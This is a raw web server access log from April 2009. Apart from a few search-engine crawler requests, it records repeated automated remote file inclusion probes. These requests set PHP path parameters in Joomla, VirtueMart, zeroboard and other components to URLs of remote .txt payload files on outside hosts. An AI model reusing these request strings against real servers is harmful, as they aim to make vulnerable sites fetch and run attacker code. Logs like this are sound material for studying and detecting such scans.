65.55.208.130 - - [26/Apr/2009:20:35:03 -0500] "GET /logs/access_log.1226188800 HTTP/1.1" 200 26685 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.12.13.152 - - [26/Apr/2009:20:37:28 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:37:28 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:37:28 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:20:38:23 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:20:38:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:20:38:24 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:20:38:24 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.221.130.17 - - [26/Apr/2009:20:40:09 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:20:40:09 -0500] "GET /e404.php?DOCUMENT_ROOT=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
81.12.13.152 - - [26/Apr/2009:20:41:04 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:41:04 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:42:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:42:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:42:17 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:42:17 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:20:46:50 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:20:46:50 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:20:46:50 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:51:38 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:54:05 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:54:05 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:54:05 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:54:05 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:57:22 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:57:24 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:57:24 -0500] "GET /logs/access_log.1239321600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
211.43.212.111 - - [26/Apr/2009:20:57:42 -0500] "GET ///?_zb_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.43.212.111 - - [26/Apr/2009:20:57:44 -0500] "GET /logs///?_zb_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 200 187157 "-""Mozilla/5.0"
211.43.212.111 - - [26/Apr/2009:20:58:12 -0500] "GET /logs/access_log.1234137600///?_zb_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:58:24 -0500] "GET /logs/access_log.1239235200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:58:27 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:58:27 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:58:28 -0500] "GET /logs/access_log.1239321600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
211.43.212.111 - - [26/Apr/2009:20:58:52 -0500] "GET /logs/access_log.1236384000///?_zb_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.17 - - [26/Apr/2009:21:06:54 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:21:06:54 -0500] "GET //include/bbs.lib.inc.php?site_path=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:21:09:00 -0500] "GET /logs/htmltonuke.php?filnavn=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:21:09:00 -0500] "GET /htmltonuke.php?filnavn=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.76.68.7 - - [26/Apr/2009:21:11:32 -0500] "GET /e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
212.76.68.7 - - [26/Apr/2009:21:11:32 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
212.76.68.7 - - [26/Apr/2009:21:11:32 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.76.68.7 - - [26/Apr/2009:21:11:32 -0500] "GET /logs/access_log.1238371200/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.111.154.16 - - [26/Apr/2009:21:11:44 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:21:11:45 -0500] "GET /_vti_cnf?D=D HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:21:11:46 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
77.221.130.17 - - [26/Apr/2009:21:19:30 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:21:19:30 -0500] "GET /e404.php?DOCUMENT_ROOT=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:25:46 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:25:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:25:49 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:25:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
204.200.195.110 - - [26/Apr/2009:21:27:23 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
204.200.195.110 - - [26/Apr/2009:21:27:23 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
204.200.195.110 - - [26/Apr/2009:21:27:23 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
75.145.152.113 - - [26/Apr/2009:21:27:38 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.145.152.113 - - [26/Apr/2009:21:27:38 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
75.145.152.113 - - [26/Apr/2009:21:27:38 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:28:52 -0500] "GET /logs/components/com_jce/jce.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:28:52 -0500] "GET /logs/access_log.1239148800/components/com_jce/jce.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:28:52 -0500] "GET /components/com_jce/jce.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:28:58 -0500] "GET /logs/access_log.1238457600/components/com_jce/jce.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.116.84.254 - - [26/Apr/2009:21:41:42 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.candidography.com/zero/1?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.116.84.254 - - [26/Apr/2009:21:41:42 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.candidography.com/zero/1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.116.84.254 - - [26/Apr/2009:21:41:43 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://www.candidography.com/zero/1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.116.84.254 - - [26/Apr/2009:21:41:47 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.candidography.com/zero/1?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
204.200.195.110 - - [26/Apr/2009:21:44:49 -0500] "GET /logs/access_log.1239235200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:46:50 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:46:50 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:46:50 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
92.52.110.170 - - [26/Apr/2009:21:48:27 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
92.52.110.170 - - [26/Apr/2009:21:48:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
92.52.110.170 - - [26/Apr/2009:21:48:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
92.52.110.170 - - [26/Apr/2009:21:48:29 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:24 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:24 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:24 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:21:50:27 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
210.179.177.167 - - [26/Apr/2009:21:52:35 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:21:52:35 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
202.44.52.204 - - [26/Apr/2009:21:53:01 -0500] "GET /logs//include/lib.inc.php?site_path=http://cutor.cz/katalog/components/gefel.txt? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
202.44.52.204 - - [26/Apr/2009:21:53:01 -0500] "GET //include/lib.inc.php?site_path=http://cutor.cz/katalog/components/gefel.txt? HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
202.44.52.204 - - [26/Apr/2009:21:53:01 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://cutor.cz/katalog/components/gefel.txt? HTTP/1.1" 404 330 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
121.78.70.9 - - [26/Apr/2009:21:53:04 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:21:53:04 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
67.205.89.200 - - [26/Apr/2009:21:55:48 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.205.89.200 - - [26/Apr/2009:21:55:48 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.205.89.200 - - [26/Apr/2009:21:55:48 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.205.89.200 - - [26/Apr/2009:21:55:55 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:57:54 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:57:54 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:21:57:54 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:21:59:19 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 187151 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:59:20 -0500] "GET /?INCLUDE_FOLDER=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:59:22 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 187151 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:21:59:23 -0500] "GET /?INCLUDE_FOLDER=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
121.78.70.9 - - [26/Apr/2009:22:03:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:22:03:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
89.111.184.103 - - [26/Apr/2009:22:04:07 -0500] "GET /logs/access_log.1228608000//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:04:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:04:08 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.70.9 - - [26/Apr/2009:22:04:22 -0500] "GET /logs/access_log.1228608000//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:22:04:23 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:22:04:23 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
217.147.30.80 - - [26/Apr/2009:22:04:41 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.hackercatcher.com/vv.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
217.147.30.80 - - [26/Apr/2009:22:04:41 -0500] "GET //include/lib.inc.php?site_path=http://www.hackercatcher.com/vv.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.55.30.194 - - [26/Apr/2009:22:06:42 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.221.130.6 - - [26/Apr/2009:22:06:58 -0500] "GET /logs/access_log.1228608000//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:06:58 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:06:58 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.70.9 - - [26/Apr/2009:22:07:53 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:22:07:53 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 303 "-""libwww-perl/5.53"
210.179.177.167 - - [26/Apr/2009:22:10:09 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:22:10:10 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:22:11:32 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:22:11:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
122.116.178.20 - - [26/Apr/2009:22:11:59 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.116.178.20 - - [26/Apr/2009:22:12:12 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://smshitronics.com///components/com_virtuemart/fx29id2.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:22:15:18 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:22:15:19 -0500] "GET //include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:22:15:24 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:22:15:25 -0500] "GET //include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:18:06 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:18:06 -0500] "GET //guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
